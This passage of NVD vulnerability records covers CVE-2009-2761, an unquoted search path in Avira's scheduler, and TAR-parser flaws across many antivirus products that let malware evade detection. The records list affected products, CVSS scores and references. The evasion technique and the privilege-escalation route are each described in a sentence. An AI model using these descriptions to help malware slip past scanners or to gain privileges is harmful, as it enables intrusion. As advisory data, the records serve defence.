         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36712",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         url: "http://securityreason.com/securityalert/2764",
      },
      {
         source: "cve@mitre.org",
         url: "http://securitytracker.com/id?1018131",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063624.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36712",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securityreason.com/securityalert/2764",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://securitytracker.com/id?1018131",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.010%5D%20-%20Avira%20Antivir%20Antivirus%20LZH%20parsing%20Arbitrary%20Code%20Execution%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/469805/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34551",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2009-08-13 16:30
Modified
2024-11-21 01:05
Severity ?
Summary
Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the "C:\Program Files\avira\" directory.
Impacted products



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "FDD00670-7EC0-4AA4-98EF-C8AE38330284",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:professional:*:*:*:*:*",
                     matchCriteriaId: "38451FC5-030A-4766-9239-828089FA70D7",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "60FC2C76-3B5F-418E-A2DD-9F5D2FBE4EF5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_security_suite:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "F805305F-CFA4-4BC9-8C89-885D85B4B8E5",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Unquoted Windows search path vulnerability in the scheduler (sched.exe) in Avira AntiVir, AntiVir Premium, Premium Security Suite, and AntiVir Professional might allow local users to gain privileges via a malicious antivir.exe file in the \"C:\\Program Files\\avira\\\" directory.",
      },
      {
         lang: "es",
         value: "Vulnerabilidad de búsqueda  de ruta no entrecomillada en Windows en el planificador (sched.exe) en Avira AntiVir, AntiVir Premium, Premium Security Suite y AntiVir Professional, podría permitir a usuarios locales elevar sus privilegios a través de un archivo antivir.exe malicioso en el directorio \"C:\\Program Files\\avira\\\" (\"C:\\Archivos de Programa\\avira\\\").",
      },
   ],
   id: "CVE-2009-2761",
   lastModified: "2024-11-21T01:05:40.430",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "LOCAL",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.2,
               confidentialityImpact: "COMPLETE",
               integrityImpact: "COMPLETE",
               vectorString: "AV:L/AC:L/Au:N/C:C/I:C/A:C",
               version: "2.0",
            },
            exploitabilityScore: 3.9,
            impactScore: 10,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2009-08-13T16:30:01.267",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.osvdb.org/55647",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://archives.neohapsis.com/archives/bugtraq/2009-01/0146.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://blog.zoller.lu/2009/01/tzo-2009-2-avira-antivir-priviledge.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.osvdb.org/55647",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.vupen.com/english/advisories/2008/3130",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/46568",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:36
Severity ?
Summary
The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \50\4B\03\04 character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations. [Editor's note: \50\4B\03\04 denotes the hex bytes 50 4B 03 04, i.e. ASCII "PK" followed by 0x03 0x04, which is the ZIP local file header signature; a scanner that selects its archive parser from the leading bytes may therefore handle the file as ZIP instead of TAR.]



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The TAR file parser in Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, Quick Heal (aka Cat QuickHeal) 11.00, Emsisoft Anti-Malware 5.1.0.1, Fortinet Antivirus 4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, PC Tools AntiVirus 7.0.3.5, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, and Trend Micro HouseCall 9.120.0.1004 allows remote attackers to bypass malware detection via a POSIX TAR file with an initial \\50\\4B\\03\\04 character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador sintáctico de ficheros TAR en Avira AntiVir v7.11.1.163, Antiy Labs AVL SDK v2.0.3.7, Quick Heal (también conocido como Cat QuickHeal) v11.00, Emsisoft Anti-Malware v5.1.0.1, Fortinet Antivirus v4.2.254.0, Ikarus Virus Utilities T3 Command Line Scanner v1.1.97.0, Jiangmin Antivirus v13.0.900, Kaspersky Anti-Virus v7.0.0.125, McAfee Anti-Virus Scanning Engine v5.400.0.1158, McAfee Gateway (formalmente Webwasher) v2010.1C, NOD32 Antivirus v5795, Norman Antivirus v6.06.12, PC Tools AntiVirus v7.0.3.5, AVEngine v20101.3.0.103 en Symantec Endpoint Protection v11, Trend Micro AntiVirus v9.120.0.1004, y Trend Micro HouseCall v9.120.0.1004 permite a atacantes remotos evitar la detección de malware a través de un fichero POSIX TAR con la siguiente secuencia de caracteres \\50\\4B\\03\\04.  NOTA: Esto se puede dividir después en varios CVEs si se publicara información mostrando el error que produciría en distintas implementaciones de analizadores sintácticos.",
      },
   ],
   id: "CVE-2012-1425",
   lastModified: "2024-11-21T01:36:57.320",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:47.397",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80389",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80391",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80392",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80395",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80396",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80403",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80409",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80389",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80391",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80392",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80395",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80396",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80403",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80409",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:37
Severity ?
Summary
The TAR file parser in AhnLab V3 Internet Security 2011.01.18.00, Avira AntiVir 7.11.1.163, Antiy Labs AVL SDK 2.0.3.7, avast! Antivirus 4.8.1351.0 and 5.0.677.0, AVG Anti-Virus 10.0.0.1190, Bitdefender 7.2, Quick Heal (aka Cat QuickHeal) 11.00, ClamAV 0.96.4, Command Antivirus 5.2.11.5, Comodo Antivirus 7424, Emsisoft Anti-Malware 5.1.0.1, F-Prot Antivirus 4.6.2.117, F-Secure Anti-Virus 9.0.16160.0, Fortinet Antivirus 4.2.254.0, G Data AntiVirus 21, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Jiangmin Antivirus 13.0.900, K7 AntiVirus 9.77.3565, Kaspersky Anti-Virus 7.0.0.125, McAfee Anti-Virus Scanning Engine 5.400.0.1158, McAfee Gateway (formerly Webwasher) 2010.1C, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, NOD32 Antivirus 5795, Norman Antivirus 6.06.12, nProtect Anti-Virus 2011-01-17.01, Panda Antivirus 10.0.2.7, PC Tools AntiVirus 7.0.3.5, Rising Antivirus 22.83.00.03, Sophos Anti-Virus 4.61.0, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Trend Micro AntiVirus 9.120.0.1004, Trend Micro HouseCall 9.120.0.1004, VBA32 3.12.14.2, and VirusBuster 13.6.151.0 allows remote attackers to bypass malware detection via a TAR archive entry with a length field corresponding to that entire entry, plus part of the header of the next entry. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different TAR parser implementations.
References
cve@mitre.org | http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
cve@mitre.org | http://osvdb.org/80389
cve@mitre.org | http://osvdb.org/80390
cve@mitre.org | http://osvdb.org/80391
cve@mitre.org | http://osvdb.org/80392
cve@mitre.org | http://osvdb.org/80393
cve@mitre.org | http://osvdb.org/80395
cve@mitre.org | http://osvdb.org/80396
cve@mitre.org | http://osvdb.org/80403
cve@mitre.org | http://osvdb.org/80406
cve@mitre.org | http://osvdb.org/80407
cve@mitre.org | http://osvdb.org/80409
cve@mitre.org | http://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.org | http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
cve@mitre.org | http://www.securityfocus.com/archive/1/522005
cve@mitre.org | http://www.securityfocus.com/bid/52623
cve@mitre.org | https://exchange.xforce.ibmcloud.com/vulnerabilities/74302
af854a3a-2127-422b-91ae-364da2661108 | http://lists.opensuse.org/opensuse-security-announce/2012-07/msg00002.html
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80389
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80390
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80391
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80392
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80393
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80395
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80396
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80403
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80406
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80407
af854a3a-2127-422b-91ae-364da2661108 | http://osvdb.org/80409
af854a3a-2127-422b-91ae-364da2661108 | http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108 | http://www.mandriva.com/security/advisories?name=MDVSA-2012:094
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108 | http://www.securityfocus.com/bid/52623
af854a3a-2127-422b-91ae-364da2661108 | https://exchange.xforce.ibmcloud.com/vulnerabilities/74302



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B91745E-EA83-4C70-BF2D-45A3678FA157",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                     matchCriteriaId: "803A9A92-A984-43A8-8D27-C9A6FDB19A9D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB884937-53F0-4BB5-AA8F-1CCDCD1221D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                     matchCriteriaId: "D386C31F-6114-4A15-B0D5-15686D7EF8B8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "D95F8C32-D238-493F-A28D-8A588E8ADD13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "0912E21E-1EEB-4ADD-958F-F8AEBBF7C5E6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
